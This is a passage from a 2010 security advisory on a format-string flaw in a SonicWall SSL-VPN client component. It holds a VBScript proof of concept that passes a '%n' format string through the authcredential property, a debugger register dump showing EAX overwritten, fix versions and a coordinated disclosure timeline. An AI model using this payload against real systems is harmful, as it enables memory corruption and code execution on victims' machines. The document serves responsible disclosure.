sub submit_onclick
        eax=string(2, unescape("%u6161"))
        arg="%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n"
        'eax 61616161

        buf=eax+arg

        obj.authcredential = buf
end sub

</script>
</body>
</html>

notes:
======

the exploit overwrites the eax register with 0x61616161.

eax 61616161
ecx 000007f2
edx 00000000
ebx ffff006e
esp 01929ae4
ebp 01929f54
esi 00000020
edi 00000002
eip 77c1391b msvcrt.77c1391b
c 0  es 0023 32bit 0(ffffffff)
p 1  cs 001b 32bit 0(ffffffff)
a 0  ss 0023 32bit 0(ffffffff)
z 1  ds 0023 32bit 0(ffffffff)
s 0  fs 003b 32bit 7ffd8000(fff)
t 0  gs 0000 null
d 0
o 0  lasterr error_success (00000000)
efl 00010246 (no,nb,e,be,ns,pe,ge,le)
st0 empty +unorm 1c68 00000000 e162aa10
st1 empty 7.5918347351318302720e-1715
st2 empty +unorm 001c 7779065d e19f4f1c
st3 empty 3.4653990691284428800e+1178
st4 empty 0.0000000000840901890e-4933
st5 empty -??? ffff 00000000 00000000
st6 empty 6.4564231821671188480e-4932
st7 empty 1.0000000000000000000
               3 2 1 0      e s p u o z d i
fst 0000  cond 0 0 0 0  err 0 0 0 0 0 0 0 0  (gt)
fcw 027f  prec near,53  mask    1 1 1 1 1 1

the function where the exception occurs looks like this:

77c1391b   8908             mov dword ptr ds:[eax],ecx

solution:
=========

version 10.0.5:
+--------------

download the new version on

version 10.5.1:
+--------------

sonicwall security advisory:
?kbid=8272

disclosure timeline (yyyy/mm/dd):
=================================

2010.02.22: vulnerability found
2010.06.08: ask on full-disc for a sonicwall security contact
2010.06.09: initial contact by info () sonicwall and germany () sonicwall
            email address
2010.06.09: initial vendor response by phone from a german sonicwall se
2010.06.09: got an email from sonicwall as a response to my mail to
            full-disc with the contact email address
            security () sonicwall com
2010.06.10: sent the notification and disclosure policy and ask for a
            pgp key
            [-] no response
2010.06.18: got an email response from the sonicwall ssl-vpn product
            manager with a pgp key.
2010.06.19: sent poc, advisory, disclosure policy and planned disclosure
            date (2010.06.24) to vendor
2010.06.19: sonicwall acknowledges the reception of the advisory
2010.06.22: vendor verifies the vulnerability
2010.07.07: ask for a status update, because the planned release date
            was the 2010.06.24
2010.07.07: sonicwall informs me that they will release a new version
            at end of july.
2010.07.07: changed release date to 2010.07.29
2010.07.29: ask for a status update, because the planned release date
            is the 2010.07.29
2010.07.29: sonicwall informs me that the version 10.0.5 is in final qa
            and should be released next week.
2010.08.13: send sonicwall the information, that i will release the
            advisory at wednesday 2010.08.18.
2010.08.16: sonicwall informs me that the version 10.0.5 is already
            downloadable for customers.
2010.08.16: ask for an sonicwall advisory and a list of affected
            products
2010.08.17: sonicwall sends me there advisory draft
2010.08.18: ask sonicwall for credits in there advisory
2010.08.19: release of this advisory